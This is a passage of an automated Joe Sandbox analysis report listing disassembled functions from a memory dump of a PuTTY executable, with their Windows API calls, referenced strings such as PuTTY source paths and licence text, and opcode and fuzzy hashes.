Opcode Fuzzy Hash: 99a8ed1da29b6135dc9af6eb052ebcb6cbefb3d32bcd5991eb9ef7de7588eb91
Instruction Fuzzy Hash: 0AF089B5941350EFD7101F50FD0FB963B65FB02B11F054011FA06A67E0D7B11948DAB5

Uniqueness

Uniqueness Score: -1.00%

Function 00CFCEA7 Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 174a3ac91dd645d14185d65c94a4b13d536a2f28c010dfd3d8777077697b173f
Instruction ID: ce45f88618d3d02b0fc9198a9543689f6c47e5b3df8de41313b4e2397595ca4c
Opcode Fuzzy Hash: 174a3ac91dd645d14185d65c94a4b13d536a2f28c010dfd3d8777077697b173f
Instruction Fuzzy Hash: D7B1F470E0424D9FDB55DF99C881BBDBBB2EF46310F148158E612AB392C7719E42CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00D03D24 Relevance: 9.2, APIs: 6, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,00D03D0F,?,?,?,?,?,?,?,?,?), ref: 00D03DCA
__freea.LIBCMT ref: 00D03F5F
__freea.LIBCMT ref: 00D03F65
__freea.LIBCMT ref: 00D03F9B
__freea.LIBCMT ref: 00D03FA1
__freea.LIBCMT ref: 00D03FB1

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: __freea$Info
String ID:
API String ID: 541289543-0
Opcode ID: 9506ebe8c985259b0e06262d7169982575b77d580d339e60c7457018b60cb16c
Instruction ID: 4b07a7c05e66a6050c008ca4caf0722ce2c550eea614384b451f147f2a6b4e4f
Opcode Fuzzy Hash: 9506ebe8c985259b0e06262d7169982575b77d580d339e60c7457018b60cb16c
Instruction Fuzzy Hash: 8A71B472D0424AABDF219F54CC81BAE7BBD9F49710F280259FA48A72C1D735DE448771

Uniqueness

Uniqueness Score: -1.00%

Function 00C46FF0 Relevance: 9.1, APIs: 6, Instructions: 116COMMON

Download Yara Rule

APIs

SelectObject.GDI32 ref: 00C470C5
GetCharWidth32W.GDI32(?,?), ref: 00C470D6
GetCharWidthW.GDI32(?,?), ref: 00C470EA
SelectObject.GDI32(?), ref: 00C47113
GetCharWidth32A.GDI32 ref: 00C47124
GetCharWidthA.GDI32 ref: 00C47138

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Char$ObjectSelectWidthWidth32
String ID:
API String ID: 4136774150-0
Opcode ID: 573e9df44be5692bc2aaa4cf97034c372765e30a3f716899d4f091bb7e46cc7e
Instruction ID: a235184f714f08f0655a276e603ab4167167de8e6c47682659a45694e34d097d
Opcode Fuzzy Hash: 573e9df44be5692bc2aaa4cf97034c372765e30a3f716899d4f091bb7e46cc7e
Instruction Fuzzy Hash: 98310A796492149FD7144B15EC89B6A3FAAFB46360F080326F52ACA3F1C369CC94E671

Uniqueness

Uniqueness Score: -1.00%

Function 00C639E0 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

CreateFontA.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000001,?), ref: 00C63A51
GetDC.USER32(00000000), ref: 00C63A5B
SelectObject.GDI32(00000000,00000000), ref: 00C63A69
GetTextMetricsA.GDI32(00000000), ref: 00C63A77
ReleaseDC.USER32(00000000,00000000), ref: 00C63A97
DeleteObject.GDI32(00000000), ref: 00C63AA2

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Object$CreateDeleteFontMetricsReleaseSelectText
String ID:
API String ID: 4134816134-0
Opcode ID: 098c7f4c5d64ee92cf32e59b5f05b3b942e53225f4113e57766388867b700546
Instruction ID: 4906a3ccf06315a65c570c253f4e38e6134467402ed001bc496d30c0fbc005e6
Opcode Fuzzy Hash: 098c7f4c5d64ee92cf32e59b5f05b3b942e53225f4113e57766388867b700546
Instruction Fuzzy Hash: BB21C932B453946BE7705BE0AC86B7B3B58EF41B50F090019FD99EF2C1D6619E01A7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2780 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00CF2777,00CDF0F3,00CDED79), ref: 00CF278E
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CF279C
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CF27B5
SetLastError.KERNEL32(00000000,00CF2777,00CDF0F3,00CDED79), ref: 00CF2807

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 33ee7ea11372ec6550ebdd91b47ae0d2e648241088ea42117d15e49c88490593
Instruction ID: 0637c0fa2ca7da7d5f45ede0202ece5ed43ab2d9a188d9699880571cd7532da7
Opcode Fuzzy Hash: 33ee7ea11372ec6550ebdd91b47ae0d2e648241088ea42117d15e49c88490593
Instruction Fuzzy Hash: D90171376097195FA6A52A75BC855772B94EB037B5B20023EF720C52F0EF614801E6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00C49A20 Relevance: 9.0, APIs: 6, Instructions: 47COMMON

Download Yara Rule

APIs

CreatePen.GDI32(00000000,00000000,?), ref: 00C49A55
SelectObject.GDI32(00000000), ref: 00C49A68
MoveToEx.GDI32(?,?,00000000), ref: 00C49A7B
LineTo.GDI32(?,?), ref: 00C49A8C
SelectObject.GDI32(00000000), ref: 00C49A99
DeleteObject.GDI32(00000000), ref: 00C49A9C

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Object$Select$CreateDeleteLineMove
String ID:
API String ID: 3907703346-0
Opcode ID: f61e4b00ae38ba856479577222ad46bb48d38a7c3c32d8fb610a809546c75c77
Instruction ID: c89f3561c773129ad7b47dfc18274e8b5bd598f856aa9512063c0944dfacedf9
Opcode Fuzzy Hash: f61e4b00ae38ba856479577222ad46bb48d38a7c3c32d8fb610a809546c75c77
Instruction Fuzzy Hash: 8C018F3B941324EFCB210F51FD0AE9B7F6AFB8A764F090114FA19D2670C23298509B70

Uniqueness

Uniqueness Score: -1.00%

Function 00C69AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C69B86
_strlen.LIBCMT ref: 00C69BAA
_strlen.LIBCMT ref: 00C69BDD
_strspn.LIBCMT ref: 00C69C19

Strings

0123456789, xrefs: 00C69C13

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen$_strspn
String ID: 0123456789
API String ID: 3953159543-2793719750
Opcode ID: 21cf7e81f05e9ef793cec9c5826cbe575e55180a53a0b88156c8f4e9db674c6d
Instruction ID: 4f6a4ec85ce926f270fb1f0f8d24eb89bfd97b16eae563cf494143be71e1975e
Opcode Fuzzy Hash: 21cf7e81f05e9ef793cec9c5826cbe575e55180a53a0b88156c8f4e9db674c6d
Instruction Fuzzy Hash: E85165B4900204AFD6209F24DC46E2777ADEF99308F18496CF5499B352D633ED55CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CCF180 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 129libraryloaderCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00CCF196
GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CCF20A

Strings

CryptProtectMemory, xrefs: 00CCF204
crypt32.dll, xrefs: 00CCF1EE
%02x, xrefs: 00CCF296

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressProc_strlen
String ID: %02x$CryptProtectMemory$crypt32.dll
API String ID: 480852294-4241872374
Opcode ID: d283c83c041fd2ac1e3c651ee263cf5df6085c15eb5990c33fa1e16dbbe10af1
Instruction ID: 73837047901933b85ffc9678e34138cade9da232d3d92c558c9d20b2a614efc0
Opcode Fuzzy Hash: d283c83c041fd2ac1e3c651ee263cf5df6085c15eb5990c33fa1e16dbbe10af1
Instruction Fuzzy Hash: 903106F69403406BD7106B34BC4AF6B3BE99F52314F090438F84ADB342EA21DA199673

Uniqueness

Uniqueness Score: -1.00%

Function 00C5ED70 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C896E0: GetLocalTime.KERNEL32(?,?,?,?,00C64BB4,?), ref: 00C896F6

_strftime.LIBCMT ref: 00C5ED99
SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000,00000000), ref: 00C5EE18
SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 00C5EE2E
SendDlgItemMessageA.USER32(000003E9,00000197,-000000FF,00000000), ref: 00C5EE46

Strings

%Y-%m-%d %H:%M:%S, xrefs: 00C5ED91

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemMessageSend$LocalTime_strftime
String ID: %Y-%m-%d %H:%M:%S
API String ID: 3243744690-819171244
Opcode ID: b84701eac9c4fdb3ab2ce312442a4b0262f70790301e894533574f06b9b62e92
Instruction ID: 4f653e8269d0e741c6b6e95e721faaa4398c6babcef5ee946bd1b3b94dcab62d
Opcode Fuzzy Hash: b84701eac9c4fdb3ab2ce312442a4b0262f70790301e894533574f06b9b62e92
Instruction Fuzzy Hash: CA31087D600300AFEB049F34EC83B6937A5EB8A704F584525F915DB3E0E6B1AA48DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00C634B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,00000190,00000000,00000000), ref: 00C63544
SendDlgItemMessageA.USER32(?,?,00000188,00000000,00000000), ref: 00C63575

Strings

c->ctrl->listbox.height != 0, xrefs: 00C63525
c && c->ctrl->type == CTRL_LISTBOX, xrefs: 00C63500
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C634FB, 00C63520

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX$c->ctrl->listbox.height != 0
API String ID: 3015471070-1339798492
Opcode ID: ad67a959e53d58f32cbbd17adabd34767062cbe3f632da19b37c88c33a638d1f
Instruction ID: a62226f49cc09db8f901f719ee21e4afb59c924e9a9b5846c8d49544e5be30eb
Opcode Fuzzy Hash: ad67a959e53d58f32cbbd17adabd34767062cbe3f632da19b37c88c33a638d1f
Instruction Fuzzy Hash: 1F21BE71640384EFE6309B18DDCAF22B7E8EB05754F210625F816DB2E1E771AE54CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C41A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00C41A91
MessageBoxA.USER32(?,00000000,00000000,00000031), ref: 00C41B16
DestroyWindow.USER32 ref: 00C41B22

Strings

Are you sure you want to close this session?%s%s, xrefs: 00C41AE5
%s Exit Confirmation, xrefs: 00C41AA4

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CursorDestroyMessageShowWindow
String ID: %s Exit Confirmation$Are you sure you want to close this session?%s%s
API String ID: 1466741823-1096320758
Opcode ID: 3d1c5317ceab5b28be313d3a4b0afaa933e8795a20a0ac036064a14eedbb68ee
Instruction ID: 9bbf9cc5521f93ace0b1ed2fe1a3daa2de2b21bd418ecdab92b348787a7c4f52
Opcode Fuzzy Hash: 3d1c5317ceab5b28be313d3a4b0afaa933e8795a20a0ac036064a14eedbb68ee
Instruction Fuzzy Hash: 7A210BB9A003006FDB1467707C4AB363596EB99304F0C4434F94EC6392F9665949EBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00C45F20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000), ref: 00C45F69
UnmapViewOfFile.KERNEL32(00000000), ref: 00C45FAB
CloseHandle.KERNEL32(?), ref: 00C45FB5

Strings

Serialised configuration data was invalid, xrefs: 00C45FD7
%p:%u, xrefs: 00C45F49

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: FileView$CloseHandleUnmap
String ID: %p:%u$Serialised configuration data was invalid
API String ID: 2927507641-1340088990
Opcode ID: e4e6996149d7d03f8806d10d2385d246db906cb36a86093df62d209596db9178
Instruction ID: 3df22692e3da1c048b2b3b41ade041309bae0904edcb639b84adceb77656df3d
Opcode Fuzzy Hash: e4e6996149d7d03f8806d10d2385d246db906cb36a86093df62d209596db9178
Instruction Fuzzy Hash: DF118E70608301AFE7149FA0DC4AB2BBBA5FF88740F00481CF9958A391D7709908DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00C75DA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

htonl.WS2_32(?), ref: 00C75E45

Strings

false && "bad address family in sk_addrcopy", xrefs: 00C75E5B
addr->addresses && step.curraddr < addr->naddresses, xrefs: 00C75E33
family != AF_UNSPEC, xrefs: 00C75DD0
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/network.c, xrefs: 00C75DCB, 00C75E2E, 00C75E56

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: htonl
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/network.c$addr->addresses && step.curraddr < addr->naddresses$false && "bad address family in sk_addrcopy"$family != AF_UNSPEC
API String ID: 2009864989-2927126840
Opcode ID: 6ed64b78dd1df7334f72ccd9e83ab374b77c1021a84a3aace69f70ee42f9d5c7
Instruction ID: ee0902f49f2a07c9ab5c7d6bdd55358039c26fa2bcd5f4629a13d6c695261a5e
Opcode Fuzzy Hash: 6ed64b78dd1df7334f72ccd9e83ab374b77c1021a84a3aace69f70ee42f9d5c7
Instruction Fuzzy Hash: 7421CD74700B019FCB24CF08CA86916B3A5EB59710F15C85AF96DCB341E7B5EE40CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00CFF941 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00CFFA04,?,?,00D43AE8,00000000,?,00CFF914,00000004,InitializeCriticalSectionEx,00D1B998,00D1B9A0,00000000), ref: 00CFF9D2

Strings

api-ms-, xrefs: 00CFF992

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 6ede4829a8f8dcf3777a45dde6311da93f3c13ab09e411a23e1d31f1b3b596b9
Instruction ID: ca7105d6a2acd8a7c2a8aea386384827b36ea17e1cf5c474e3aa91aee9526a9b
Opcode Fuzzy Hash: 6ede4829a8f8dcf3777a45dde6311da93f3c13ab09e411a23e1d31f1b3b596b9
Instruction Fuzzy Hash: F511C132A01329BBCB624B689C4476D3364EF02760F250135EB65E7380D7A0EF028AF6

Uniqueness

Uniqueness Score: -1.00%

Function 00C74D10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,00C748A9), ref: 00C74D4B
DeleteFileA.KERNEL32(00000000,00000002,00000000,?,00C748A9), ref: 00C74D5C
GetLastError.KERNEL32 ref: 00C74D66
GetLastError.KERNEL32 ref: 00C74D71

Strings

Unable to delete '%s': %s, xrefs: 00C74D82

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorFileLast$CreateDelete
String ID: Unable to delete '%s': %s
API String ID: 3657518308-26304762
Opcode ID: 3a014133817a5b2da1420e548f039995f6d0d5c78ffbc8f5e5159dc517b317a8
Instruction ID: 295663a93ce162b399dbd73ee0bbc65852ead841dcf1377ad5a33835303e51b3
Opcode Fuzzy Hash: 3a014133817a5b2da1420e548f039995f6d0d5c78ffbc8f5e5159dc517b317a8
Instruction Fuzzy Hash: 5901F9F57013126BE3245B75BC4AB7F365EEFA5364F244628F42AC2280E7204D558A75

Uniqueness

Uniqueness Score: -1.00%

Function 00CEAB20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,87DC40FB,?,?,00000000,00D06794,000000FF,?,00CEABEA,00CEAA85,?,00CEAC86,00000000), ref: 00CEAB55
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CEAB67
FreeLibrary.KERNEL32(00000000,?,?,00000000,00D06794,000000FF,?,00CEABEA,00CEAA85,?,00CEAC86,00000000), ref: 00CEAB89

Strings

CorExitProcess, xrefs: 00CEAB5F
mscoree.dll, xrefs: 00CEAB4E

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a6287124b5b43e298479c4b11b901244feb0b9c84a121ab1405c7b6080812888
Instruction ID: 79fa957e28fb8a30caa7c671dd9aa1926f896fa9117bfe67adb2448cb161bf6a
Opcode Fuzzy Hash: a6287124b5b43e298479c4b11b901244feb0b9c84a121ab1405c7b6080812888
Instruction Fuzzy Hash: E401A236914759AFCB118F55DC05FAEBBB9FB04B60F010629E821E2690DBB4A900CEA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C5F290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(?,00000000), ref: 00C5F2C6
SetDlgItemTextA.USER32(?,000003EA,PuTTY is copyright 1997-2023 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso), ref: 00C5F2E0
EndDialog.USER32(?,00000001), ref: 00C5F2FD

Strings

%s Licence, xrefs: 00C5F2B5
